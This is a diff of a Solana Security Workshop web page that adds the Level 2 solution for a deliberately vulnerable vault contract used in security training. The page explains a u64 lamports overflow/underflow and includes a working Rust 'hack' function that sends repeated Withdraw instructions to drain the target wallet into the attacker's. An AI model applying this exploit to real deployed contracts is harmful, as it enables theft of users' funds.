--- a/level2-solution.html
+++ b/level2-solution.html
@@ -3,7 +3,7 @@
     <head>
         <!-- Book generated using mdBook -->
         <meta charset="UTF-8">
-        <title>Introduction - Solana Security Workshop</title>
+        <title>Solution - Solana Security Workshop</title>
 
 
         <!-- Custom HTML head -->
@@ -81,7 +81,7 @@
 
         <nav id="sidebar" class="sidebar" aria-label="Table of contents">
             <div class="sidebar-scrollbox">
-                <ol class="chapter"><li class="chapter-item expanded "><a href="index.html" class="active"><strong aria-hidden="true">1.</strong> Introduction</a></li><li class="chapter-item expanded "><a href="workshop.html"><strong aria-hidden="true">2.</strong> Workshop</a></li><li class="chapter-item expanded "><a href="setup.html"><strong aria-hidden="true">3.</strong> Setup</a></li><li class="chapter-item expanded "><a href="poc_framework.html"><strong aria-hidden="true">4.</strong> PoC Framework</a></li><li class="chapter-item expanded "><a href="level0-solution.html"><strong aria-hidden="true">5.</strong> Level 0 - A first vulnerability Solution</a></li><li class="chapter-item expanded "><a href="level1.html"><strong aria-hidden="true">6.</strong> Level 1 - Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level1-hint1.html"><strong aria-hidden="true">6.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level1-hint2.html"><strong aria-hidden="true">6.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level1-bug.html"><strong aria-hidden="true">6.3.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level1-solution.html"><strong aria-hidden="true">6.4.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level2.html"><strong aria-hidden="true">7.</strong> Level 2 - Secure Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-solution.html"><strong aria-hidden="true">7.1.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level3.html"><strong aria-hidden="true">8.</strong> Level 3 - Tip Pool</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-hint1.html"><strong aria-hidden="true">8.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level2-hint2.html"><strong aria-hidden="true">8.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level3-solution.html"><strong aria-hidden="true">8.3.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level4.html"><strong aria-hidden="true">9.</strong> Level 4 - SPL-Token Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level4-hint1.html"><strong aria-hidden="true">9.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level4-hint2.html"><strong aria-hidden="true">9.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level4-hint3.html"><strong aria-hidden="true">9.3.</strong> Hint 3</a></li><li class="chapter-item expanded "><a href="level4-bug.html"><strong aria-hidden="true">9.4.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level4-solution.html"><strong aria-hidden="true">9.5.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="resources.html">Resources</a></li></ol>
+                <ol class="chapter"><li class="chapter-item expanded "><a href="index.html"><strong aria-hidden="true">1.</strong> Introduction</a></li><li class="chapter-item expanded "><a href="workshop.html"><strong aria-hidden="true">2.</strong> Workshop</a></li><li class="chapter-item expanded "><a href="setup.html"><strong aria-hidden="true">3.</strong> Setup</a></li><li class="chapter-item expanded "><a href="poc_framework.html"><strong aria-hidden="true">4.</strong> PoC Framework</a></li><li class="chapter-item expanded "><a href="level0-solution.html"><strong aria-hidden="true">5.</strong> Level 0 - A first vulnerability Solution</a></li><li class="chapter-item expanded "><a href="level1.html"><strong aria-hidden="true">6.</strong> Level 1 - Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level1-hint1.html"><strong aria-hidden="true">6.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level1-hint2.html"><strong aria-hidden="true">6.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level1-bug.html"><strong aria-hidden="true">6.3.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level1-solution.html"><strong aria-hidden="true">6.4.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level2.html"><strong aria-hidden="true">7.</strong> Level 2 - Secure Personal Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-solution.html" class="active"><strong aria-hidden="true">7.1.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level3.html"><strong aria-hidden="true">8.</strong> Level 3 - Tip Pool</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level2-hint1.html"><strong aria-hidden="true">8.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level2-hint2.html"><strong aria-hidden="true">8.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level3-solution.html"><strong aria-hidden="true">8.3.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="level4.html"><strong aria-hidden="true">9.</strong> Level 4 - SPL-Token Vault</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="level4-hint1.html"><strong aria-hidden="true">9.1.</strong> Hint 1</a></li><li class="chapter-item expanded "><a href="level4-hint2.html"><strong aria-hidden="true">9.2.</strong> Hint 2</a></li><li class="chapter-item expanded "><a href="level4-hint3.html"><strong aria-hidden="true">9.3.</strong> Hint 3</a></li><li class="chapter-item expanded "><a href="level4-bug.html"><strong aria-hidden="true">9.4.</strong> Bug</a></li><li class="chapter-item expanded "><a href="level4-solution.html"><strong aria-hidden="true">9.5.</strong> Solution</a></li></ol></li><li class="chapter-item expanded "><a href="resources.html">Resources</a></li></ol>
             </div>
             <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
         </nav>
@@ -145,30 +145,96 @@
 
                 <div id="content" class="content">
                     <main>
-                        <h1 id="introduction"><a class="header" href="#introduction">Introduction</a></h1>
-<p>Welcome to the Solana Security Workshop!
-Here, we'll look at Solana Smart Contracts from an attacker's perspective.
-By learning how to find and exploit different types of issues, you'll be able to write more secure contracts as you'll know what to watch out for.</p>
-<p>In the first part of the course, we'll introduce concepts relevant to the security of Solana Contracts and explore one vulnerability in detail.
-After this part, we've prepared several smart contracts as challenges.
-Each of these will illustrate a different Solana smart contract bug.
-You're encouraged to work on exploiting these on your own. If you get stuck, please ask questions, we love to help. If you are attending remotely, this book will also provide some hints, which we recommend you read only if you don't progress yourself.</p>
-<p>Much code you'll see during this workshop is intentionally vulnerable. Even if the bugs are fixed, the code does not follow good design guidelines. Please do all of us a favor and not use it outside of security demonstrations.</p>
-<h2 id="requirements"><a class="header" href="#requirements">Requirements</a></h2>
-<p>To follow along with this course, you need to be familiar with writing solana contracts and the <a href="https://rust-lang.org/">Rust</a> programming language.</p>
-<p>You'll also need an environment where you can compile the example contracts and run the attacks.
-We have prepared remote environments if you need them, for details, see <a href="setup.html">Setup</a>.</p>
-<h2 id="who-we-are"><a class="header" href="#who-we-are">Who We Are</a></h2>
-<p>We started as a group of independent researchers, who love digging into complex concepts and projects. At the end of 2020 we have been introduced into the Solana ecosystem by looking at Solana-core code, in which we have found a number of vulnerabilities. We have since founded the security-research firm <a href="https://neodyme.io">Neodyme</a>, which has been helping the Solana Foundation with peer-reviews of smart contracts.</p>
-<p>As such, we have found lots of interesting and critical bugs in smart contracts.
-To help make the Ecosystem a more secure place, we want to share what we can in this short 3h workshop. We hope you enjoy breaking our prepared contracts as much as we do.</p>
+                        <h1 id="solution---overflowunderflow"><a class="header" href="#solution---overflowunderflow">Solution - Overflow/Underflow</a></h1>
+<p>The vulnerability in this contract is an overflow/underflow in the deposit function:</p>
+<pre><code class="language-rs">    **wallet_info.lamports.borrow_mut() -= amount;
+    **destination_info.lamports.borrow_mut() += amount;
+</code></pre>
+<p>For a large <code>amount</code> the <code>u64</code> lamports overflow/underflow. If an attacker sets <code>wallet_info</code> to the hackers-wallet and <code>destination_info</code> to the rich-boi-wallet, he can underflow the <code>wallet_info</code> and therefore increase his lamports. On the other hand he can overflow the <code>destination_info</code> and therefore decrease the destination lamports. 
+See https://play.rust-lang.org/?version=stable&amp;mode=release&amp;edition=2021&amp;gist=c446a40de01a3af7957817ebe199237a</p>
+<p>There is one more trick to it, as there is a rent check: </p>
+<pre><code class="language-rs">    let min_balance = rent.minimum_balance(WALLET_LEN as usize);
+    if min_balance + amount &gt; **wallet_info.lamports.borrow_mut() {
+        return Err(ProgramError::InsufficientFunds);
+    }
+</code></pre>
+<p>But this only limits the maximum amount stolen per iteration to min_balance lamports.</p>
+<p>example solution by Thomas:</p>
+<pre><pre class="playground"><code class="language-rust">
+<span class="boring">#![allow(unused)]
+</span><span class="boring">fn main() {
+</span>use borsh::BorshSerialize;
+use level2::{WalletInstruction, get_wallet_address};
+use solana_program::instruction::{AccountMeta, Instruction};
+use solana_program::rent::Rent;
+use solana_program::sysvar;
+
+
+
+fn hack(env: &amp;mut LocalEnvironment, challenge: &amp;Challenge) {
+    // create hackers wallet
+    assert_tx_success(env.execute_as_transaction(
+        &amp;[level2::initialize(
+            challenge.wallet_program,
+            challenge.hacker.pubkey(),
+        )],
+        &amp;[&amp;challenge.hacker],
+    ));
+
+    let hacker_wallet = get_wallet_address(challenge.hacker.pubkey(), challenge.wallet_program);
+
+    let to_transfer = Rent::default().minimum_balance(8);
+    println!(&quot;To transfer: {}&quot;, to_transfer);
+    //let to_transfer = 1_000_000u64;
+    let overflow = (-(to_transfer as i64)) as u64;
+
+    let iters = 10;
+
+    for i in 0..iters {
+        let tx = env.execute_as_transaction(
+            &amp;[Instruction {
+                program_id: challenge.wallet_program,
+                accounts: vec![
+                    AccountMeta::new(hacker_wallet, false),              // source wallet
+                    AccountMeta::new(challenge.hacker.pubkey(), true),   // owner
+                    AccountMeta::new(challenge.wallet_address, false),   // target wallet
+                    AccountMeta::new_readonly(sysvar::rent::id(), false), // rent
+                ],
+                data: WalletInstruction::Withdraw { amount: overflow+i }.try_to_vec().unwrap(),
+            }],
+            &amp;[&amp;challenge.hacker],
+        );
+        tx.print_named(&amp;format!(&quot;haxx {}&quot;, i));
+    }
+    
+
+    let tx = env.execute_as_transaction(
+        &amp;[Instruction {
+            program_id: challenge.wallet_program,
+            accounts: vec![
+                AccountMeta::new(hacker_wallet, false),              // source wallet
+                AccountMeta::new(challenge.hacker.pubkey(), true),   // owner
+                AccountMeta::new(challenge.hacker.pubkey(), false),  // target wallet
+                AccountMeta::new_readonly(sysvar::rent::id(), false), // rent
+            ],
+            data: WalletInstruction::Withdraw { amount: to_transfer*iters-1000 }.try_to_vec().unwrap(),
+        }],
+        &amp;[&amp;challenge.hacker],
+    );
+    tx.print_named(&quot;hacker withdraw&quot;);
+}
+<span class="boring">}
+</span></code></pre></pre>
 
                     </main>
 
                     <nav class="nav-wrapper" aria-label="Page navigation">
                         <!-- Mobile navigation buttons -->
+                            <a rel="prev" href="level2.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
+                                <i class="fa fa-angle-left"></i>
+                            </a>
 
-                            <a rel="next" href="workshop.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
+                            <a rel="next" href="level3.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                 <i class="fa fa-angle-right"></i>
                             </a>
 
@@ -178,8 +244,11 @@ To help make the Ecosystem a more secure place, we want to share what we can in 
             </div>
 
             <nav class="nav-wide-wrapper" aria-label="Page navigation">
+                    <a rel="prev" href="level2.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
+                        <i class="fa fa-angle-left"></i>
+                    </a>
 
-                    <a rel="next" href="workshop.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
+                    <a rel="next" href="level3.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                         <i class="fa fa-angle-right"></i>
                     </a>
             </nav>
